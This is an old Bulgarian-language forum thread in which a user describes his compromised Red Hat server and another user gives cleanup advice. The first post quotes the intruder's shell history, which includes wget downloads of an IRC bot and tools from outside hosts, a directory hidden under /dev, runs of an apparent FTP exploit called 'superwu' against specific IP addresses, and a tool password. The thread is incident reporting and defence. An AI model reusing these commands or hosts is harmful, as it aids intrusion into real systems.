Титла: Hack!! kakvo da pravia Публикувано от: eureka в Nov 19, 2002, 14:42 Zdravej,
Imam nujda ot pomosht i tyrsia otgovori na iakolko vyprosa. Predi okolo mesec si pusnah kabelen internet, i tyj kato tova mi beshe neshto kato "detska mechta" - vednaga podkarah na ednin star Pentium na 188 Mhz RedHat 6.2. Spriah pochti vsichko s izkliuchenie na DNS,http,Authentication service na port 113 /NE ZNAM KAK DA GO SPRA/, i kachih SSH2-non comersial version. Configurirah go da rutira vsichko praz nego i s ipchains maskirah localnite adresi. Kompiutyra raboti taka v prodyljenie na mesec kato az chat-pat vlizah za da pocykam (opitvah da si podkaram multi-ruter-trafo-grafer(ne sym)) ... i taka. Predi dva dena se lognah i ostanovih che imam mail !!! tochnia text ne moga da ti kaja .. //za syjalenie dokato chovyrkah sym zatril mbox-a// ..no beshe neshto svyrzano s err pri logratate zapochnah da se chudia i da "rychkam" za da ustanovia prichinata.. i se natyknah na stranni "pisania" v history-to: 789 exit ********* 790 cd /dev/hpd 791 cd /dev/hpd 792 cd /dev 793 mkdir hpd 794 cd hpd 795 ls 796 ftp lordice.ro 797 ls 798 tar -zvf 1.tar.gz 799 tar -xvf 1.tar.gz 800 tar -xf 1.tar.gz 801 tar -zxvf 1.tar.gz 802 ls 803 tar -zf 1.tar.gz 804 tar --help 805 tar -tvf 1.tar.gz 806 rm -rf 1.tar.gz 807 wget folositoare.go.ro/1.tar.gz 808 ftp 65.126.126.199 809 ftp 193.231.236.41 810 ftp 193.231.236.41 811 wget imperr.home.ro/darkbot-6f6-r6_tar.tar 812 ftp blabla.com 813 ftp alyla.net 814 ls 815 tar -xzvf darkbot-6f6-r6_tar.tar 816 cd darkbot6f6/ 817 ls 818 cd dat 819 ls 820 cd .. 821 cd docs 822 ls 823 pico README 824 cd .. 825 cd../ 826 pico 827 cd .. 828 ls 829 rm -rf bitchbot-1_0_2_tar.tar darkbot6f6 830 rm -rf darkbot-6f6-r6_tar.tar 831 tar -xzvf superwu.tar.gz 832 cd super-wu 833 ./superwu 64.18.125.90 21 834 ./superwu 64.244.71.19 21 ******* 835 cd /mnt/cdrom ... kakto mojesh da si predstavish uchudvaneto mi beshe super goliamo... s enda 'last' command ustanovih che ima zapisi ot roda ** ftp ftpd12124 pD9514DE2.dip.t- Tue Nov 5 14:50 - 14:53 (003) ftp ftpd1645 telehouse-103-1- Fri Nov 8 09:39 - 09:40 (000) ftp ftpd1276 206.48.88.103 Wed Nov 6 14:10 - down (03:12) ftp ftpd872 160.40.15.54 Wed Nov 6 027 - down (15:16) ** ) .. ADOVA RABOTA .. dokopah se do 'superwu' i pri startiranetpo mi iska password v edna ot poddirectoriite otkrih 'README' v koeto pishe samo!!: password:wegotelectricstyle seshtash se che ia napisah ... i mi se poiavi "Ask Electricy members for this" ps -A ne mi raboi / lipsvat hiliadi logove / i kakvo li oshte ne ot togava gi tyrsia i ne znam kakvo da pravia. Obshto vzeto tova e. Razchitam na niakakvo mnenie i support Pozdravi Eureka PS kak da spra authentication service na port 113 Титла: Hack!! kakvo da pravia Публикувано от: savel в Nov 19, 2002, 15:34 o4evidno nqkoi te e "root-nal" , demek hack-nal
pyrvo ako ti e localno mashinata spri vsi4ki remote login demoni dori vsi4ki ostanali sled koeto pregledai kakvito logove sa ti ostanali i ako mojesh ottam razberi koga , kak i etc. proverqvqsh /etc/passwd za dobaveni users i triesh ako ima symnitelni v /etc/inetd.conf preglejdash za dobaveni services koito da slujat kato backdoor i gi mahash ako ima takiva sled koeto killall -HUP inetd poglejdash za symnitelni procesi s ps , ili netstat tyrsish i ostaveni setuid root files za kernel root kit malko trudno she proverish , nai-sigurno e upgrade na kernela ot rpm ili src update-vash si i ftp, httpd , dns i t.n. a vyzmojno e da sa podmeneni i /bin/login i /bin/su primerno uspeh a i oshte neshto hacker4eto si e napravilo dir v /dev, /dev/hpd razgledai i q iztrii ps syshto moje da e podmenen za da krie opredeleni procesi... authentication se spira kato comment-nesh reda za identd v /etc/inetd.conf , i sled tova restartirash inetd |